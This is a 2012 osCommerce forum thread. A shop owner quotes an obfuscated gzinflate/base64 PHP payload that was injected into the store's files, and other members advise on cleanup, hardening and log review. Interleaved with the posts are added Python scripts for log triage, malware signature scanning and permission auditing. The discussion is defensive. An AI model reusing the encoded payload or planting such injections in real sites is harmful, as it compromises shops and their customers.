12 replies to this topic
#1
Posted 26 June 2012 - 09:27 AM
Hello.
It is now the second time I had to remove this code. The code appears in admin and catalog directories in index.php and login.php files. The code is:
#c3284d#
echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
#/c3284d#
How can I protect the web store from this? Any suggestions?
thanks
#2
Posted 26 June 2012 - 09:34 AM
@mesko
1. All .php and .js files should have 444 permission.
2. All folders should have 555 permission.
3. Admin folder should be renamed.
4. Add captcha to create account, contact us, reviews and any other forms on site.
5. Make admin .htaccess protected.
6. Disable file manager.
8. Frequently check website for any vulnerability through Google webmaster/ http://www.acunetix.com/vulnerability-scanner/
Also visit this link once; Gary (@burt) gave it to me to secure one of my sites.
http://forums.oscommerce.com/topic/375288-updated-security-thread/
Praful
Like post..hit LIKE button.
osCommerce | Joomla | WordPress | Magento | SEO | CakePHP | CI
Guaranteed Website Speed Optimization!!
#3
Posted 26 June 2012 - 09:42 AM
http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/
http://forums.oscommerce.com/index.php?showtopic=340995
These 2 show how to secure your site, but as it has already been hacked you need to restore to a clean state and apply the fixes, or find the changes and clean them out.
Here is an extract from the how to on my web site
If you are going to do it yourself you have 2 choices:-
1) Wipe your entire site and restore the code and data from a known good backup and apply the security patches.
2) Cleanse the site.
Once you decide on how you are going to proceed, you also have to decide "shall I close the site whilst I am doing this?", this is a bit of a no brainer, lock down your site so no-one can get in. Do this by password protecting the root of your site, use your hosting control panel to do this and get to work. When you have finished and the site is OK again you can remove this password.
Even if you have a clean backup, you have to discover how they got in and plug the hole.
If you want to cleanse your site yourself I have a list of useful tips and tricks such as:-
1) For an unsophisticated hack look at the date/time of the files on your site and see if there are files changed at a date/time that you did not do.
2) Look in those files and see if there is some suspicious code.
3) If there is, remove the "suspicious" code.
4) Check the logs for that period and see how they got in. You have to check the access logs and ftp access logs and look for suspicious entries. Look for POST commands like
83.166.171.182 -[01/Jan/2011:08:51:14 -0500] "POST /catalog//admin/categories.php/login.php?cPath=&action=new_product_preview
This is the suspicious bit - categories.php/login.php
93.186.164.130 - - [31/Jan/2011:11:13:44 -0500] "POST /account.php HTTP/1.0" 200 9 www.xxxxxxxxx.com "-" "-" "-"
Here it is the "-" "-" "-" that is suspicious.
Use our "Contact Us" page to request a more complete copy of this set of Tips & Tricks.
If you have a basic OSC install but no backup, it might be better to save the data, wipe the site, reinstall, add on any contributions etc and lock down the site by installing the security contributions as recommended on the OSC Security forum.
If your site has been significantly amended and you do not have a clean back up then you will need to go through every file on the site and check its contents. This can be done on a local copy of the files and a good editor.
Try these simple instructions on how to disinfect your site.
There are 2 contributions that highlight hacked files:
VTS - Virus Threat System, excellent for initial cleansing.
Site Monitor - Better for ongoing monitoring.
This one even tries to disinfect the site for a specific hack but can be altered for yours if required: Site57 .info Hack Fix
Then make sure you install the Security Contributions recommended in the first thread in the osc security forum, as they plug the known holes in the code, before you go live again. You should also verify the permissions on the directories and files on your site are correct.
How to restore your database / To overwrite a db with a back-up
1. Take a back up of the current db and store on your local PC.
2. Open file to be restored in notepad or other editor.
3. Check if "CREATE TABLE IF NOT EXISTS `address_book`" statement is present.
4. Check if "truncate table if exists `address_book`" statement is present.
5. Go into phpMyAdmin.
6. Select the db you want to import.
7. Select the Import tab.
8. Follow the options available.
HTH
G
Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile
Virus Threat Scanner
My Contributions
Basic install answers.
Click here for Contributions / Add Ons.
UK your site.
Site Move.
Basic design info.
For links mentioned in old answers that are no longer here follow this link Useful Threads.
If this post was useful, click the Like This button over there ======>>>>>.
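The two access-log indicators named in the extract above (a POST whose path nests one .php script under another, and a POST whose trailing quoted fields are all "-") can be checked mechanically. This is an added example, not code from the thread or from osCommerce; the reason labels, the host name and the sample lines are constructed, and the trailing-field rule assumes a log format with at least two quoted fields after the request.

```python
import re

# Leading fields of a common/combined-style access log line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+)\s.*?\[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<method>[A-Z]+)\s+(?P<target>\S+)[^"]*"(?P<rest>.*)$'
)
# A .php script followed by another path segment ending in .php,
# as in the extract's "categories.php/login.php".
NESTED_PHP_RE = re.compile(r"\.php/+[^?\s]*\.php", re.IGNORECASE)
QUOTED_RE = re.compile(r'"([^"]*)"')


def triage(lines):
    """Return (ip, timestamp, target, reasons) for each suspicious POST."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m.group("method") != "POST":
            continue
        reasons = []
        path = m.group("target").split("?", 1)[0]
        if NESTED_PHP_RE.search(path):
            reasons.append("nested-php-path")
        # Quoted fields after the request line (referer, user agent, ...).
        trailing = QUOTED_RE.findall(m.group("rest"))
        if len(trailing) >= 2 and all(field == "-" for field in trailing):
            reasons.append("blank-client-headers")
        if reasons:
            findings.append((m.group("ip"), m.group("ts"), m.group("target"), reasons))
    return findings


# Constructed sample lines (documentation IP ranges, hypothetical host name).
SAMPLE_LOG = """
192.0.2.10 - - [01/Jan/2011:08:51:14 -0500] "POST /catalog/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 512 shop.example "-" "Mozilla/5.0" "-"
198.51.100.7 - - [31/Jan/2011:11:13:44 -0500] "POST /account.php HTTP/1.0" 200 9 shop.example "-" "-" "-"
203.0.113.5 - - [31/Jan/2011:11:20:02 -0500] "POST /checkout_process.php HTTP/1.1" 302 0 shop.example "http://shop.example/checkout_confirmation.php" "Mozilla/5.0" "-"
203.0.113.5 - - [31/Jan/2011:11:21:00 -0500] "GET /index.php HTTP/1.1" 200 4096 shop.example "-" "-" "-"
"""

if __name__ == "__main__":
    for ip, ts, target, reasons in triage(SAMPLE_LOG.splitlines()):
        print(f"{ts}  {ip}  {target}  <- {', '.join(reasons)}")
```

Hits are leads for manual review of the surrounding log entries, not proof of compromise on their own.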
#4
Posted 26 June 2012 - 10:30 AM
@geoffreywalton
Hey Geoffrey,
Thank you for sharing the information and security threads. Very informative.
Praful
#5 ONLINE
Posted 26 June 2012 - 12:08 PM
@mesko
Follow these steps to clean and secure your website:
1) Lock down your site by using an .htaccess password so your customers are not attacked by the hacker's code.
2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.
3) Delete the files on your hosting account before uploading the clean files.
4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.
5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE
6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444
7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'
8) Remove the .htaccess password protection so your customers can resume making purchases from your website.
9) Monitor your website using the newly installed contributions to prevent future hacker attacks.
10) If you feel you can not perform any of the above steps, you should seek professional help to ensure all malware is removed.
Chris
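Step 2 above (searching a local copy for 'base64', 'eval', 'decode') and the earlier tip about unexpected file dates can be scripted together. This is an added example, not code from the thread or from osCommerce: it flags .php, .js and .htaccess files containing a paired marker block like the one in the first post or a decode chain, and lists them oldest change first. The six-hex-digit marker pattern, the signature names and the demo files are assumptions constructed for illustration.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

SCAN_SUFFIXES = (".php", ".js", ".htaccess")
SIGNATURES = {
    # Paired markers such as #c3284d# ... #/c3284d# (hex id generalised: assumption).
    "marker-block": re.compile(r"#([0-9a-f]{6})#.*?#/\1#", re.S | re.I),
    # Compressed or rotated payload wrapped around base64_decode().
    "decode-chain": re.compile(
        r"(?:gzinflate|gzuncompress|str_rot13)\s*\(\s*base64_decode\s*\(", re.I),
    "eval-decode": re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate)\s*\(", re.I),
}


def scan_text(text):
    """Names of the signatures that match this file content."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def scan_tree(root):
    """Return (relative path, signature names, mtime) for every flagged file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(SCAN_SUFFIXES):
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                mtime = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
                findings.append((os.path.relpath(path, root), hits, mtime))
    return sorted(findings, key=lambda f: f[2])  # oldest modification first


def build_demo_tree(root):
    """Constructed sample files; the payload is an inert placeholder string."""
    infected = (
        '<?php\n#a1b2c3#\necho(gzinflate(base64_decode("QUJD")));\n#/a1b2c3#\n'
        'require("includes/application_top.php");\n'
    )
    clean = '<?php\nrequire("includes/application_top.php");\n'
    os.makedirs(os.path.join(root, "admin"))
    for rel, body in (("index.php", infected), ("product_info.php", clean),
                      (os.path.join("admin", "login.php"), infected)):
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        for rel, hits, mtime in scan_tree(tmp):
            print(f"{mtime:%Y-%m-%d %H:%M}  {rel}  {', '.join(hits)}")
```

Run it against the downloaded local copy, never the live site, and review each flagged file by hand, since legitimate code can also call base64_decode.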
#6
Posted 27 June 2012 - 01:09 PM
What osC version are you running? All the 2.2 versions have gaping security holes that need to be manually plugged. 2.3.1 is believed to be fairly secure. For 2.2, don't forget to follow the instructions to get rid of osC's file manager and define language system, and to change admin/ to some other name. Of course, all of this comes after cleaning out all traces of the hack...
Scan your PC (used to administer your site) for spyware, especially keystroke loggers and password sniffers. After any cleanup needed, change all your passwords again, as the hacker knows your current ones. Make sure you have your PC firewall up, so that you're alerted if any spyware tries to sneak out a message to the hacker with your passwords. Talk to your host to see if you can use SFTP (secure FTP) instead of regular FTP.
#7
Posted 27 June 2012 - 01:09 PM
I will follow these instructions and answer back when I'm done.
I already removed the code from all the index.php, login.php and .htaccess
Thanks, guys.
#8
Posted 27 June 2012 - 01:14 PM
I'm using oscommerce 2.3.1 and did many of these changes. But not all of them. I will also try to talk to our host for the secure FTP.
#9
Posted 27 June 2012 - 01:25 PM
Did you rename the admin folder and make it .htaccess protected?
Edited by Praful Kamble, 27 June 2012 - 01:25 PM.
#11
Posted 02 July 2012 - 08:35 AM
@Praful Kamble
Yes, did both a time ago.
@DunWeb
I cleared the infected files and changed the passwords, I hope that's enough for a while.
Thanks.
#12
Posted 02 July 2012 - 08:50 AM
@mesko
If you are done with everything Chris told you to do, then it is okay.
Also, if Google has banned your website in its search engine, then submit a reconsideration request from Webmaster Tools to inform Google that your website is virus free.
Praful
#13
Posted 02 July 2012 - 06:03 PM
1. Never have your FTP or admin login details in one soft copy.
Most hacks happen (at least if osC is 2.3.1) due to stolen passwords and not for any other reason.
2. Make sure any backdoors the hacker has inserted are removed, and that images or folders with write permissions have an .htaccess so code is not executed from there.
Ask/Skype for Free osCommerce value addon/SEO suggestion tips for your site.
Check My About US For who am I and what My company does.
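The permission ceilings from post #5 (directories no higher than 755, files no higher than 644, configure.php no higher than 444) and the point above about writable folders needing an .htaccess can be audited in one pass. This is an added example, not code from the thread or from osCommerce; it assumes "write permissions" means group- or world-writable, checks only that an .htaccess file exists (not what it contains), and uses a constructed demo layout.

```python
import os
import tempfile

DIR_MAX, FILE_MAX, CONFIG_MAX = 0o755, 0o644, 0o444  # ceilings from post #5


def excess_bits(mode, ceiling):
    """Permission bits set in mode that the ceiling does not allow."""
    return mode & ~ceiling & 0o777


def audit_tree(root):
    """Return sorted (relative path, problem) pairs for everything over its ceiling."""
    issues = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        dmode = os.stat(dirpath).st_mode & 0o777
        if excess_bits(dmode, DIR_MAX):
            issues.append((rel_dir, f"dir mode {dmode:o} exceeds 755"))
            # Assumption: "write permissions" means group- or world-writable.
            if ".htaccess" not in files:
                issues.append((rel_dir, "writable dir without .htaccess"))
        for fname in files:
            path = os.path.join(dirpath, fname)
            fmode = os.stat(path).st_mode & 0o777
            ceiling = CONFIG_MAX if fname == "configure.php" else FILE_MAX
            if excess_bits(fmode, ceiling):
                issues.append((os.path.relpath(path, root),
                               f"file mode {fmode:o} exceeds {ceiling:o}"))
    return sorted(issues)


def build_perm_demo(root):
    """Constructed layout: two 777 directories and a configure.php left at 644."""
    file_modes = {"index.php": 0o644, "includes/configure.php": 0o644,
                  "images/logo.gif": 0o644, "pub/.htaccess": 0o644}
    dir_modes = {"includes": 0o755, "images": 0o777, "pub": 0o777}
    for rel, mode in file_modes.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()
        os.chmod(path, mode)  # set explicitly so the umask does not matter
    for rel, mode in dir_modes.items():
        os.chmod(os.path.join(root, rel), mode)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_perm_demo(tmp)
        for rel, problem in audit_tree(tmp):
            print(f"{rel}: {problem}")
```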